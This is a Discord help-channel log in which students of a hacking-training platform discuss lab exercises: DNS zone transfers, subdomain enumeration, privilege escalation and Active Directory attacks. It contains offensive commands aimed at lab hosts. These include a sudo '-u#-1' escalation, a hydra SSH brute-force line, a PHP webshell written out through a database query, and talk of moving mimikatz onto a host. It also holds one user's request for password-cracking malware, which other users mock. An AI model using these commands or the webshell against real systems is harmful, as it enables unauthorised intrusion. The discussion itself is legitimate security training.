#modules

1 messages · Page 98 of 1

pulsar needle
#

Or

#

i have no clue

unborn shard
#

The .htb domain is local, it has to be associated with a target IP address in the /etc/hosts
The .com domain is public

acoustic owl
#

Each subdomain can be configured as a separate zone.
You can work according to the exclusion principle.

Is www a zone or a host? Presumably it is a web server and therefore a host.

acoustic owl
#

In this lesson you have an authoritative server, you do not need the hosts file

pulsar needle
#

wha

unborn shard
pulsar needle
#

I am so confused right now

pulsar needle
#

Its like that

#

I have to have it in the /etc/hosts file

acoustic owl
#

dig example.com @targetip

unborn shard
pulsar needle
#

Information gathering-web edition

acoustic owl
unborn shard
pulsar needle
#

Active subdomain enumeration

unborn shard
#

I haven't completed that one yet

pulsar needle
#

I forgot

#

That

pulsar needle
#

But later you will, ez

heady tusk
pulsar needle
#

There are no TXT records lmao

acoustic owl
acoustic owl
pulsar needle
#

Aaaaaaa

#

Omah

#

Omah the course said it too

#

Are different DNS records like different DNS zones?

unborn shard
pulsar needle
#

WHa

#

Hahahah, good luck man, I have no clue how to get it

#

It wont work

heady tusk
unborn shard
# pulsar needle

Click on the Hint button, it helps you.. or if you prefer I can tell you what the hint is: "One of the existing zones contains a TXT record."

#

Which means it's not that specific domain, you have to dig for the zones you have found in the previous answer

#

I'm speedrunning this module

pulsar needle
#

I found it

#

Thanks

#

I am proud of the one liner script i made

#

Yet i feel it was very simple lol

pulsar needle
unborn shard
#

I haven't read through all the things though, just done the flags so I will have to revisit it later on to see if I've missed something I didn't knew

pulsar needle
#

ah, nice fingerguns

tender shuttle
#

i'm stuck in Linux Privilege Escalation module : Section sudo Escalate the privileges and submit the contents of flag.txt as the answer. can someone plz help?

#

I tried using the command|| sudo -u#-1 /bin/ncdu|| but it only launches the ncdu program. it doesn't give me any root shell

acoustic owl
#

You are on the right track

tender shuttle
warm drift
#

please I'm stuck at footprinting oracle tns the odat tool didn't give any usernames how do I login to target server?

deep shore
#

I’m running out of ideas at the Hard Footprinting Lab in the Footprinting module. Does anyone here have a pointer? Feel free to DM and/or bash my notes.

warm drift
fiery berry
warm drift
fiery berry
#

did you try a ping sweep?

summer lava
fathom pendant
#

Most modules will not have a walk through as it's against tos for anything above tier0 to have a writeup

naive field
#

im doing login brute forcing section service authnetication brute forcing and i am trying to crack ssh, its been 10 minuts and still nothing

#

i used the command from the section

#

||hydra -l b.gates -P william.txt -u -f ssh://134.209.191.190:31542||

#

🤷‍♂️

#

is it supposed to be like that or?

fathom pendant
#

Are you using the ip and port the section is giving you?

fathom pendant
#

Ssh is a super slow service but since that looks like a docker container, that's the only service available probably

naive field
#

sorry for bothering for no reason...

fathom pendant
#

Eh it's just how it is

#

You shouldn't ever be brute forcing ssh unless you absolutely have no other thing to brute

rustic sage
fathom pendant
fathom pendant
pulsar needle
#

How am i supposed to find the fully qualified domain name of the host if it is down?

gaunt pumice
#

What Windows executable will allow us to create, query, and modify services on a host? (I need help please)

pulsar needle
#

powershell?

hasty solar
#

Hi can I dm anyone in BloodHound for BlueTeams (ACTIVE DIRECTORY BLOODHOUND module)?

#

Stuck on first question

gaunt pumice
gaunt pumice
#

INTRODUCTION TO WINDOWS COMMAND LINE - Managing Services

hasty solar
gaunt pumice
#

It's okay

fathom pendant
#

Also it seems like you're meant to use the initial axfr to get the info

pulsar needle
#

aaa so it might not be avaliable on my network

fathom pendant
#

Axfr to the initial target and/or subdomains and you should find the answer

pulsar needle
#

Btw, why do i get different results if i change the position of type and query?

fathom pendant
pulsar needle
#

-query first gives less output

gaunt pumice
fathom pendant
pulsar needle
#

Hahahha ok

rustic sage
#

hi, search ctf team

fathom pendant
#

I think I know what module you're on, they're having you use nslookup instead of dig

fathom pendant
opal jewel
#

Is it a normal behavior not to be able to hit public webservers that are spun up during WebApp portions. I have hit reset about 10 times and was only able to hit a server one time.

#

As soon as I started fuzzing w/ ffuf ( per module ) it goes down

fathom pendant
#

Can you try limiting the ffuf threads?

zinc marsh
#

They added a new challenge category 🙂

#

blockchain

pulsar needle
#

How do I stop it, and I cant find any new IP's

fathom pendant
#

Ctrl-c

opal jewel
fathom pendant
opal jewel
#

The hostd public IPs are flagged as malicious. Hehe

fathom pendant
#

Kek it's because the firewall dns can't resolve it probably

#

At least it can't resolve it to a domain

opal jewel
#

Most likely

zinc marsh
#

with the pro ñabs subscription i have access to any pro lab right?

pulsar needle
#

I cant find it

opal jewel
#

Yay. It works. Nvm. @fathom pendant you saying threads made me look at my solution

fathom pendant
# pulsar needle

Just keep looking around I can't recall the full solution but iirc you're close

pulsar needle
#

ok

unborn shard
fathom pendant
#

It's just using nslookup is a pain because the subdomain and ip are on separate lines

pulsar needle
#

Yeah

#

I hate that

#

lol

unborn shard
#

Use dig

pulsar needle
#

Ok

#

How do i stop it?

#

CTRL+C dosent work

fathom pendant
#

Just look at the whole thing and then there's a fairly obvious subdomain iirc that you dig to get it

pulsar needle
#

ok

fathom pendant
#

Close the tab and just start a new one

pulsar needle
#

Aaaaa

#

I know

#

Search for A records

#

Probably

fathom pendant
#

¯_(ツ)_/¯

unborn shard
fathom pendant
#

^

#

It depends on how big your zones list is

pulsar needle
#

9 letters

#

Words*

fathom pendant
#

Ctrl-c only stops the current running command and goes to the next

pulsar needle
#

Aaaaaaaaaa

#

I still cant find it

#

I tried looking at each zone

#

but I just got one IP from each zone

fathom pendant
#

Don't do any loop or grepping

#

Just dig first because it's possible you missed a zone

#

Means that it's having an issue with encryption

#

Most likely on your end, not the machine

#

Does the rsa key you have have any extra spaces or lines?

#

Does it have the ---Begin and ---End lines?

#

Are you sure it was copied properly?

pulsar needle
#

I have all of these in my list

fathom pendant
#

And it didn't paste weirdly

#

That tells me nothing. Its entirely possible it messed up when copying. Try recopying it from what you have found

#

Iirc I had a similar issue

fathom pendant
pulsar needle
#

Convert it to base64, then copy it then paste it

#

Or try to check the MD5 value

fathom pendant
#

Autocorrect

pulsar needle
#

Moo

#

Ah I thought the key didnt work

#

You might have some phantom spaces or whatever and if the problem is that you can convert it to base64 then decrypt it into a file

#

Its easier to copy paste base64

#

Compared to a big file

unborn shard
# pulsar needle I have all of these in my list

Why do you do the grep command? Don't do it if you don't have a good reason, otherwise you lose valuable information
Btw, I can confirm you that one of those zones is the correct one, on which you have to perform dig command, in order to get its subdomains

fathom pendant
#

Converting to base64 and decrypting makes sure it copies properly

valid cipher
#

Does curl -u user:pass https://example.com work for all website logins

valid cipher
unborn shard
fathom pendant
#

It depends. If the website uses a php or other login form you need to find how it grabs info to pass to backend to verify

#

It works for basic websites

valid cipher
#

ok thanks

pulsar needle
warm drift
#

help I ru hashcat on linux vm to crack has now whole VM is frozen

#

I ran hascat

zinc marsh
#

restart the vm maybe

unborn shard
pulsar needle
#

Wait

#

I think i spelled a word wrong

fathom pendant
pulsar needle
#

But I cant find it so I am just confuzed lol

eager tinsel
#

I want to hack

fathom pendant
pulsar needle
#

Ok

#

I wont

valid cipher
pulsar needle
#

Some of the things dont have ips, huh

fathom pendant
#

Now to escalate

#

How it feels

#

Sip I forget what the objectives of that module are

#

If you can escalate, why not

#

But also sending the link does nothing, I'm mostly answering on my phone and haven't bothered with logging in using my phone

pulsar needle
#

lol

#

Can subdomains have the same ip?

#

like admin.inlanefreight.htb and ftp.admin.inlanefreight.htb

#

I restarted the box and my pc so I am doing something wrong

acoustic owl
pulsar needle
#

I cant find the IP

#

Or FQDN

unborn shard
pulsar needle
#

I am looping through all of them

#

But I cannot find it

#

Like Ive looked

#

Some of them dont have an IP address at all

#

idk if thats normal xd

#

CLuster just lists other domains

fathom pendant
#

Ahhh you need to do a ping sweep

pulsar needle
fathom pendant
fathom pendant
pulsar needle
#

Hmm

fathom pendant
#

Don't loop, do it manually

#

With the found subdmains since it's not a large list

pulsar needle
#

Ok

elder ibex
fathom pendant
elder ibex
#

i've used harvestor and it responded with 3 host names servicing the target ip. but, none of them seem to be the answer.

fathom pendant
#

Don't need harvester

elder ibex
#

i've tried whois and nslookup also.

fathom pendant
#

Iirc they also refer to whatweb

#

With -vvv

#

Or something like that

elder ibex
#

rg. will give that a try. tnx

pulsar needle
#

I did it manually, didnt find anything :I

#

Now ill go and eat dinner, idk if it exists anymore lol

fathom pendant
#

Module name?

unborn shard
# pulsar needle I did it manually, didnt find anything :I

You make this look so complicated when it's only 2 commands:

  1. do a dig zone transfer (using axfr) on the main target (inlanefreight.htb) and save all the subdomains in a text file
  2. do the same dig command but the target now is every single subdomain you have saved in the text file and only then grep for the required ip (the one which is written in the flag question)
pulsar needle
#

Information gathering -web edition Active Subdomain Enumeration

pulsar needle
#

But it dosent owkr

#

work*

unborn shard
#

It does work, what commands have you executed?

pulsar needle
#

This dosent exist neither

unborn shard
#

Copy paste them here

fathom pendant
pulsar needle
#

I cant, its on my VM

#

This is not

elder ibex
#

@fathom pendant hi, if module name was for me, it's Information Gathering - Web Edition, skills assessment

pulsar needle
#

nslookup -type=a -query=axfr inlanefreight.htb IP

#

Then

#

I look at all the IPs and none match

#

So

#

I try to dig into the subdomains

#

WIth a loop

#

And I dont get the IP

fathom pendant
pulsar needle
#

These are all the domains I get

fathom pendant
pulsar needle
#

Huh

#

Let me try after dinner then

#

xd

#

thanks for letting me know its there

#

hehe

fathom pendant
#

Like I said you're just doing it wrong

pulsar needle
#

I tried dig a inlaneblabla ipzoneserver

#

on all of them

#

But ill try something else later

zinc marsh
#

What are the fortesses in hackthebox for?

fathom pendant
pulsar needle
#

Lmao

#

Aoch

fathom pendant
#

It's funny because these answers are related to another answer... so if you have the txt answer...

pulsar needle
#

I do

fathom pendant
#

...

pulsar needle
#

Lol

fathom pendant
pulsar needle
#

Dont tell me anything moee

#

I thought about it and i think i know idk, but after dinner heeeh

fathom pendant
#

Just do whatever you did for that answer and tweak it slightly

#

That's all I can do at this point

unborn shard
#

Maybe he understood

fathom pendant
#

They are going to go eat food and come back to it

zinc marsh
#

newbie question

#

I always see this tool

#

what is the name?

fathom pendant
#

Virustotal

valid cipher
#

need to get a better crypter boyo

zinc marsh
rustic sage
fathom pendant
#

Should probably do a different sweep method

fathom pendant
#

Especially if you're adding -Pn

rustic sage
#

my command is nmap -sn 172.16.5.0-255 -T5 --unprivileged

#

--unprivileged does not make a difference

#

-T5 does not make one too

#

for i in {1..254}; do (ping -c 1 172.16.5.$i \| grep "bytes from" &); done does not yield results too

trail leaf
#

Why are you escaping the |

rustic sage
#

oooohhhhhhhhhhh

#

yeahh

#

saw it too

#

but still no result

#

i cant figure out what the active host is

trail leaf
#

Are you sure the 172.16.5.x is correct? Haven’t done the module in a minute so this is just a legit question

fiery berry
rustic sage
tawny abyss
#

mind if I dm re: Thick application?

trail leaf
fiery berry
elder ibex
rustic sage
fathom pendant
#

Literally from the section it refers to

fiery berry
broken warren
#

I need help with the broken auth skill assesment its literally the last thing i need to finish my cbbh. I've tried all the same stuff everyone else who posted here has, obviously none of that worked. I know there are two other methods i could try but I can't remember how i did them since i lost my notes.One method im not even sure works since they never gave us an example of proper output, they just hand you some code and say understand it. IT wasnt the one of two other methods i had in mind. AND i don't understand how to the backend is evaluating my request and deciding i don't have the proper role assigned. I've gone as far as registering a new user, intercepting the request and changing the role before its fulfilled and that didn't work either.

fiery berry
rustic sage
#

wtf

#

now it works? are you kidding me xd

fiery berry
#

you were on the wrong machine

rustic sage
#

no

#

i tried on the same machine before

analog dock
#

Most likely with the faulty line

fiery berry
fathom pendant
#

^

rustic sage
#

damn you are right

#

i need a pause

elder ibex
# fathom pendant Whatweb -a3 (url) -v

yeh. i ran that and just did again. i'm either not putting the server name into the field properly or i'm not picking the right one out. do you see the answer when you do it?

vagrant gust
#

getting TypeError: setLDAPOptions() missing 1 required positional argument: 'sid' when using impacket-ntlmrelayx

#

is this another case of using an old version of python?

fathom pendant
#

Maybe

livid pier
#

I only have 100 cubes, if anyone has done both, which one you recommend?

livid pier
elder ibex
analog verge
#

Does anyone know the answer in Setting up module?

#

Can anyone give me hint on this question
What does the acronym Linux PAM stand for?

pulsar needle
#

I wont get any of the internal ones

#

Like

#

These IP's

#

I can easily find the other flag

#

but I cannot find the IP (like if I search for A addresses)

analog dock
#

Perhaps in a different path? I’m not too familiar with it

#

Didn’t get to that module yet

fathom pendant
fathom pendant
pulsar needle
#

Wait

#

What

fathom pendant
#

Since it looks like that query was specifically for txt

fathom pendant
# pulsar needle What

Modify the command you used to get the txt record. Think how you can get other records instead/as well

pulsar needle
#

It works

#

I used nslookup

#

and now it works

#

I tried with dig

#

and it dosent work

fathom pendant
#

Meaning you were doing it incorrectly previously

pulsar needle
#

I dont see the difference in what I did

#

Why does the any scan from dig fail

#

but from nslookup work?

#

aaaaaaaaaaaa

#

I looked for another zone

fathom pendant
pulsar needle
#

with the nslookup one

fathom pendant
#

Because I did dig axfr and it worked

pulsar needle
#

AAAAAAAAAA

#

I am stupid

#

Yes

#

Axfr

#

Not any

#

I did with any

#

for this whole time

#

omah

fathom pendant
pulsar needle
#

Now the rest is childs play

#

lol

#

omah

#

All of this

fathom pendant
#

Yep

pulsar needle
#

From a small mistake

#

lmao

#

Ofc

#

Aaaa

fathom pendant
#

I was not kidding though with some of the remaining answers

pulsar needle
#

it makes sense

#

I am looking for other zones

#

To find new ips

#

so therefore its axfr

#

any would just look for inlanefreight.htb subdomain ip

fathom pendant
#

Inlanefreight.htb is the domain

unborn shard
# pulsar needle I did with any

Have you understood why it's wrong and what both any and axfr do? Otherwise you simply got the flag but in a real life scenario you won't be able to apply this things

fathom pendant
#

Any x.inlanefreight.htb is a subdomain

pulsar needle
#

the way i understood it

livid pier
broken warren
#

broken auth, has anyone done it

thorn urchin
#

tons of people have

zinc marsh
#

forgot to delete the message

thorn urchin
#

better odds of getting help if you just ask your question

broken warren
# thorn urchin https://dontasktoask.com

I need help with the broken auth skill assesment its literally the last thing i need to finish my cbbh. I've tried all the same stuff everyone else who posted here has, obviously none of that worked. I know there are two other methods i could try but I can't remember how i did them since i lost my notes.One method im not even sure works since they never gave us an example of proper output, they just hand you some code and say understand it. IT wasnt the one of two other methods i had in mind. AND i don't understand how to the backend is evaluating my request and deciding i don't have the proper role assigned. I've gone as far as registering a new user, intercepting the request and changing the role before its fulfilled and that didn't work either.

rare topaz
#

screenshots

#

error messages

#

etc

broken warren
rare topaz
#

Refer to what i said, without those we can only guess what ur doing wrong

#

not actually see it

thorn urchin
#

yup

#

and sometimes just requires patience

rare topaz
#

There was a time some guy was going through so much trouble only for a single screenshot to make us realize he had a single typo.

So please, screenshots.

thorn urchin
#

Also you lost your notes? where did you build up your notes in the first place? The section content typically has all you need to do to pass the assessments

unborn shard
# pulsar needle any would just look for inlanefreight.htb subdomain ip

This is incorrect, any gets you a full set of DNS records like: A, AAAA, MX, CNAME, NS, SOA
The fact that any gave you just the subdomain ip doesn't mean that is what it's actually used for. It means only that record was retrieved successfully, which is common because many DNS servers won't even bother responding to "any" or they just reply with a link to RFC8482, where it very clearly states that ANY requests are being abolished

pulsar needle
#

Yes

#

I agree

#

Or like

#

True

#

lol

unborn shard
#

So a thing you learned from this is: do not use ANY requests.

#

Ever

broken warren
pulsar needle
#

The rest of the questions were very easy after I learned that lmao, I am already done with that section xd

unborn shard
#

Just a suggestion for next sections, read the text before jumping into questions. Even though you might think not reading all and just glancing might be faster, it would have saved you loads of time reading carefully all the text

pulsar needle
#

Indeed, thanks for the advice hehe

pulsar needle
#

I fuzzed this subdomain and I added the target to /etc/hosts (www.inlainfreight.htb) then I intercept the packets with burp and edit the domain to access the vhost websites, is this allowed?

zinc marsh
#

why u do that

#

just add it to the hosts and go to the website

pulsar needle
#

AAA

#

Lmao

rare topaz
#

what?

#

just put <ip addres> <subdomain>

#

like everyone does, in /etc/hosts

pulsar needle
#

Welp, i guess there is another way

#

😎

rare topaz
#

there's many ways to do something but it's best to just not make ur life harder on purpose

#

unless you're trying to learn

pulsar needle
#

True

#

I thought doing it through repeater would be faster

#

but who knows

thorn urchin
#

remember in the real world you rarely need to edit /etc/hosts so much

#

its mostly just a convention for lab environment limitations

pulsar needle
#

Aaaa

#

Oke

thorn urchin
#

and if its vhost enumeration youre doing then there are significantly better options then just guess adding to hosts or messing with repeater lul

pulsar needle
#

xd

#

Welp

#

I guess I just wanted to cuz i learned it in the previous module

#

lmao

#

Now I know not to do that irl

thorn urchin
#

baby steps before you run

#

and experimenting with what youve learned so far is NEVER wrong, I recommend it always

pulsar needle
#

Nice

thorn urchin
#

its the people that dont and say, 'well the material didnt tell me to do it so I didn't try' that I have concerns about

pulsar needle
#

O.o, and I love skill assessments aswell ohhhhhhhhh

thorn urchin
#

good

zinc marsh
#

I don't really understand what are the named pipes

thorn urchin
#

what about them?

#

named pipes are another inter-process communication tool thay windows has

#

kinda like a socks file in linux

#

think like a localhost tcp port except it doesnt use tcp at all

zinc marsh
#

hmm oksy

#

am I suppose to use accesschk.exe here? I get this error:

operable program or batch file.```
trail leaf
#

accesschk.exe is a binary from the SysInternals toolkit. Normally you'd have to upload it yourself if it's not on the system, but they put it in C:\Tools for you

#

reading the module helps here 🙃

zinc marsh
#

I thought it was just a binary from the system

snow steppe
#

I’m having trouble accessing a Hack The Box machine through OpenVPN, despite following the necessary steps. I have performed the following actions:

Successfully connected to the Hack The Box VPN using OpenVPN.

Added the machine's domain name (searcher.htb) to my hosts file with the correct IP address.

Verified that I can ping the machine successfully using the domain name.

However, I am unable to access the machine through my web browser using the domain name
#

can anyone help me

thorn urchin
broken warren
#

Broken Auth assessment: Ive gone as far as brute forcing the stupid support account, decoding the cookie for it to learn how it works, enumerated the account with higher privileges, created a cookie for that account and STILL get user cannot have requested role. I've gone as far as literally having to look at a walk through to figure why this isn't working and i've followed the walk through to the letter and still get the error. Even though they clearly show it working.

thorn urchin
#

id message support is thats the case

zinc marsh
#

am gonna run mimikatz in my own machine

#

there was any way to get it from the rdp?

deep owl
#

hello all

compact musk
zinc marsh
#

I got it in both

deep owl
#

i think i know the command to solve this question

#

but am wondering how can i get rubeus on the machine that i just gained shell on

#

module:ACTIVE DIRECTORY ENUMERATION & ATTACKS

#

section: Attacking Domain Trusts - Child -> Parent Trusts - from Linux

deep owl
#

Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer.

zinc marsh
#

just transfer the file

deep owl
#

how

zinc marsh
zinc marsh
zinc marsh
#

This script always works?

deep owl
#

hello there, appreciate any help regardin gmoving a mimikatz file from a linux machine to a windows machine i tried the following but faced an error scp /home/htb-student/mimikatz.exe system@172.16.5.5:"C:\Windows\Temp"
ssh: connect to host 172.16.5.5 port 22: Connection refused
lost connection

thorn urchin
deep owl
#

any other method to move the file to the windows machine'

thorn urchin
#

theres a million

#

have you done the file transfers module?

#

it depends largely on what kind of access you have, how much opsec/evasion matters in your scenario, and personal preference

#

like if I have rdp to windows and opsec is not a concern I prefer just hosting a share via xfreerdp's /drive option

#

if I have winrm I use evil-winrm's built in upload download

#

for some windows boxes I prefer having a meterpreter shell so I'll use thats built in upload/download

#

just generic powershell shell/cmd injection? ill use invoke-webrequest or certutil

#

and a lot more methods ive not named

zinc marsh
#

anyway with rdp u can just drag n drop

tight mesa
#

hello everyone, I'm stuck within the question Where is the Laudanum aspx web shell located on Pwnbox? Submit the full path. (Format: /path/to/laudanum/aspx) | Shells & Payloads module, webshells section

tight mesa
#

hello @compact musk

compact musk
tight mesa
#

any hint?

#

a little bit of context, I'm not attacking the website from the Pwnbox instead I'm attacking directly from my host and I'm pasting as an answer the absolute path located on the target

#

but it's not accepted as a valid path

#

I really don't understand what I'm missing here

thorn urchin
#

what youre missing is its asking specifically about on the pwnbox

#

fire up an instance and answer the question

tight mesa
#

ok. ty

valid cipher
#

finally finished web requests module, onto networking now

#

oh shit its long

hollow thunder
#

Anyone help me with file upload skill assessment?

#

I cannot get my test files to load. I have the correct URL, and I've read the naming algorithm, and used that as well

zinc sentinel
hollow thunder
torpid hearth
#

Hi guys

hollow thunder
#

been way to long

umbral wigeon
torpid hearth
#

What is a root flag?

fathom pendant
heavy marsh
#

In footprinting NFS I am using the command "sudo mount -t nfs 10.129.14.128:/ ./target-NFS/ -o nolock" and getting an error "mount.nfs: an incorrect mount option was specified"

#

I made a folder in my home directory for ./target-NFS

rustic sage
#

Hi I’m fairly new to hack the book. How would you simply go about gaining access to an SSH server?

heavy marsh
#

for example "ssh TheFxrsakenOne@10.0.13.12"

#

then it will prompt you for passwd

rustic sage
#

Ik that command. I’m asking in a hacking sense.

#

Like how would one go about exploiting it?

heavy marsh
#

Gotcha

#

Well, in my experience more enumeration, such as plaintext passwords

#

or other interesting files that help you get further along

#

I tried <ip>:/mnt/nfsshare as well, but it didn't work

#

this is the footprinting nfs lesson

#

still getting "mount.nfs: an incorrect mount option was specified"

#

I've used NFS in one of the boxes on the main HTB platform and it worked fine

heavy marsh
#

where should I put that, at the end?

steady hawk
#

Instead of -o noclock

heavy marsh
#

what is noclock and what is rw?

#

those weren't explained in the lesson, so I just went with what they said

green aurora
#

Hy.. can anybody tell me what is the right way to install ngnix and ajo module iam stuck in server side attack module I have tried a lot configured nginx with ajp proxy still it through some error

steady hawk
#

I'm not sure on the specifics, I know that they are mounting options. rw stands for read-write, sometimes if noclock doesn't work, rw will

heavy marsh
#

rw worked

#

Thank you!

#

I'm surprised that hasn't been asked before, I looked it up on google, HTB forums, and in the history here.

#

I did verbatim what they had in the lesson

heavy marsh
#

I swore I had copied/pasted

#

lol

steady hawk
#

Nice catch!

green aurora
#

Is there any done server side attack

thorn urchin
#

you cant ping scan through a socks proxy

frank hazel
wooden rapids
#

after completing the SqlMap-Essentials - bypassing web application protections, i was wondering if anybody could enlighten me, particularly with -random-agant and --tamper=between or for any other script, is there any hints in the reqs and response that could hint at what type of protection you need bypass or is it just a matter of guessing and trial and error?

zinc sentinel
#

Exploiting Web Vulnerabilities in Thick-Client Applications 💀 🔫

pine dagger
zinc sentinel
pine dagger
#

That'll happen with a lot of the tier 2 and above modules. Some problems you will bash your head against.

zinc sentinel
#

Can confirm I have bashed my head a few times

pine dagger
#

Worst modules for me were: Active Directory Enumeration, Advanced SQL Injection, Secure Coding, and Whitebox Pentesting 101. Certainly there's been a few other modules that have been challenging, but most times people have already asked similar questions so I can figure out my own answer.

zinc marsh
#

Why would u think that

#

U are asking what u wrote wrong

#

and u didn't send the code

zinc sentinel
plain coral
zinc marsh
zinc marsh
shut juniper
#

Starting the windows fundamental module, is it recommended to use w11 on a virtualbox as a host machine?

zinc marsh
# zinc sentinel
<SNIP>
public String open(String foldername, String filename) throws MessageParseException, MessageBuildException, IOException {
    String methodName = (new Object() {}).getClass().getEnclosingMethod().getName();
    logger.logInfo("[+] Method '" + methodName + "' was called by user '" + this.user.getUsername() + "'.");
    if (AccessCheck.checkAccess(methodName, this.user)) {
        return "Error: Method '" + methodName + "' is not allowed for this user account";
    }
    this.action = new ActionMessage(this.sessionID, "open");
    this.action.addArgument(foldername);
    this.action.addArgument(filename);
    sendAndRecv();
    String desktopPath = System.getProperty("user.home") + "\\Desktop\\fatty-server.jar";
    FileOutputStream fos = new FileOutputStream(desktopPath);
    
    if (this.response.hasError()) {
        return "Error: Your action caused an error on the application server!";
    }
    
    byte[] content = this.response.getContent();
    fos.write(content);
    fos.close();
    
    return "Successfully saved the file to " + desktopPath;
}
<SNIP>```
zinc sentinel
zinc sentinel
zinc marsh
gaunt monolith
#

Hi in Attacking Common services - Easy lab I wrote this query in DB To get webshell MariaDB [(none)]> SELECT "<?php echo shell_exec($_GET['c']); ?>" INTO OUTFILE 'C:\webshell.php'; Query OK, 1 row affected (0.076 sec)
I need to get access it on URL ... when use http://10.129.203.7/webshell.php?c=dir I get 404 and when try http://10.129.203.7/dashboard/webshell.php?c=dir also get 404 ?
what I missed?

#

Done .. but how can I learn what happened 😅

#

I mean how can I know to use your query?

zinc sentinel
#

chatGPT but also the correct file path is to upload to is most important

gaunt monolith
#

Great thanks

zinc marsh
#

u are suppose to have readen this already "WebServersInfo.txt"

gaunt monolith
rapid sparrow
#

I need some help with this module

#

I already followed the instructions, but the SeLoadDriverPrivilege is not exist when I typed whoami /priv

rapid sparrow
# rapid sparrow I need some help with this module

I figure it out, I need to open a cmd as admin using the username and password that already provided.
Follow the steps in this section to escalate privileges to SYSTEM, and submit the contents of the flag.txt file on administrator's Desktop. Necessary tools for both methods can be found in the C:\Tools directory, or you can practice compiling and uploading them on your own.

pine dagger
#

Has anyone done Whitebox Pentesting 101: Command Injection Skill Assessment? Having some issues getting the injection, which I know is mostly a syntax issue. Would like to pick someone's brain. 🙂

pine dagger
#

Hey, did you complete the skill assessment for Whitebox pentesting? 🙂

lethal shard
#

Hello! I'm trying to find the local internal resource in Injection Attacks Module Skills Assessment. I already identified the ||PDF injection|| and now i'm stucked on it( Any hints on it?

royal spire
#

hey folks, i need a help, I'm trying to play Pilgrimage, I start the Machine and when I try to access the Web Based Attackbox, I get an error saying "You're not assigned to this VPN Server", how can I solve the problem?

coarse meadow
#

can someone help me make a malware for password crackng??

zinc marsh
coarse meadow
#

what?

#

whats soo funny?

zinc marsh
#

what languages do u know

coarse meadow
#

hungary and english

zinc marsh
coarse meadow
#

I still dont get it

zinc marsh
#

i think u need to read this first

coarse meadow
#

thx

royal spire
#

can you help me too shockp?

#

@zinc marsh

coarse meadow
#

#shockp if I press start for free what dose that do?

#

@zinc marsh

royal spire
#

@coarse meadow are you also a beginner just like me??

coarse meadow
#

@royal spire yes and I would like to leart to hack roctar account

#

rokstar

#

sorry

#

why cant I spell

royal spire
#

let's talk separately

coarse meadow
#

rockstal

#

Rockstar

#

ok

zinc marsh
royal spire
#

no, this is my first machine

zinc marsh
royal spire
#

i'm currently learning Navigating HTB lesson

#

from HTB Academy

candid zephyr
#

has anyone done the kerberos attacks module? I'm a bit confused with the unconstrained delegation - users section

acoustic owl
analog verge
#

What does the acronym Linux PAM stand for ? I known the answer is pluggable authentication modules but I keep getting the wrong answers is there problem with my answers?

acoustic owl
fickle nacelle
#

Enumerate the target using the concepts taught in this section. List the hostname of MSSQL server. having trouble with this can someone give me a nudge please i was pretty sure i was using the right command

#

sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248

royal spire
royal spire
#

thank you

acoustic owl
fickle nacelle
#

footprinting mssql

#

the output for that asks me to debug and even then not getting the desired output

zinc marsh
#

and retire machines

acoustic owl
royal spire
zinc marsh
#

https://academy.hackthebox.com/module/67/section/603 Windows Privilege Escalation -- DnsAdmin -- Using Mimilib.dll -- This dll is part of windows or I need to upload it myself? https://github.com/gentilkiwi/mimikatz/tree/master/mimilib

GitHub

A little tool to play with Windows security. Contribute to gentilkiwi/mimikatz development by creating an account on GitHub.

fickle nacelle
foggy light
#

I need a little bit help.. Can I Dm you?

zinc marsh
#

why i cannot open the administrator desktop if i got create a user and add it to domain admins?

wispy aspen
#

you might run a Get-ACL on that folder; Domain Admins can add themselves to everything but may not immediately have access to everything

acoustic owl
zinc marsh
#

doing get-acl C:\

#

i get access to the whole system?

wispy aspen
#

No, you're Getting the Access Control List

trail leaf
#

I just used secretsdump because I was too lazy to look up the Get-ACL syntax when I was running into that

coarse meadow
#

can someone pls tell me how to use a brute force?

zinc marsh
zinc marsh
coarse meadow
#

where?

zinc marsh
#

this is for ethical hacking

#

not for kiddy stuff

coarse meadow
#

oh

#

@zinc marsh 419 PAGE EXPIRED

#

can someone other then @zinc marsh tech me how to use brute force?

zinc marsh
#
acoustic owl
zinc marsh
#

I tried to set read rights and full rights over C:\users\administrator

#

and I get access denied

#

k

floral fulcrum
#

any nudges for the Documentation and Reporting skills assessment?
I tried to crack ||clusteragent|| hash as managed to enumerate the user as domain admin but to no avail.
Also managed to crack the IPMI hash for ||admin|| but to no success (cannot connect remotely)

coarse meadow
#

@rustic sage and hacking itu other cumputers is not illigal?

rustic sage
#

Hi, I've been noticing my speed of reading through the hackthebox CPTS modules is quite slow.

Can anyone tell me about good ways to learn affective and go faster though it?
I've been doing the course quite some time now. Now I don't sit everyday for it, and just go through it the entire day. I Take peeks when I feel motivated enough to learn more, and create the time to read it.

Would love some great advice! Thank you in advance

Ps: I take tons of notes

#

I think your proxychains is not configured right yet

#

But how do you take notes when you don't have in control how fast it reads? And easily being able to pause it?

#

I tried that with some extension, and didn't feel that affective

#

I'll give it a try. I got ADD, so fast distracted 😛

zinc marsh
#

who told u cannot ping sweep

#

he told u cannot ping scan

acoustic owl
fathom pendant
zinc marsh
#

ping sweep is not nmap ping scan

fathom pendant
#

Nmap can perform one

#

But it's not the only way

#

A ping sweep is just pinging a list of ips and seeing if something comes back

#

It's not necessarily scanning any info

#

Don't.

rare topaz
#

istfg whats with all the goofy ahh posts lately

fathom pendant
#

I'm willing to be a mentor at this point for $100 a session for the goofy ahhh ppl

valid cipher
#

i didnt know u were a mod marcie

autumn pilot
#

keep the friendly vibe, people come from different backgrounds and have different knowledge/skill

fathom pendant
#

Not a mod

valid cipher
#

i got muted 1 min

fathom pendant
#

Just community helper

fathom pendant
valid cipher
zinc marsh
rare topaz
#

not you, there were two people spamming goofy questions in a couple channels/threads

fathom pendant
#

^

valid cipher
#

how he wants to hack people

floral fulcrum
regal gust
#

Hi all! Trying the nmap room at the moment, trying to find the hostname, but my scans keep getting stuck at 85.71% and become unrecoverable, any ideas?

fathom pendant
#

This

fathom pendant
regal gust
#

Seems to be -A and -sV that make the scan stall there, probably because of the non standard service on a later port,

fathom pendant
#

Yes

#

You want to run a blank scan first and be more aggressive using -p {list,of,ports}

regal gust
#

Ah cool

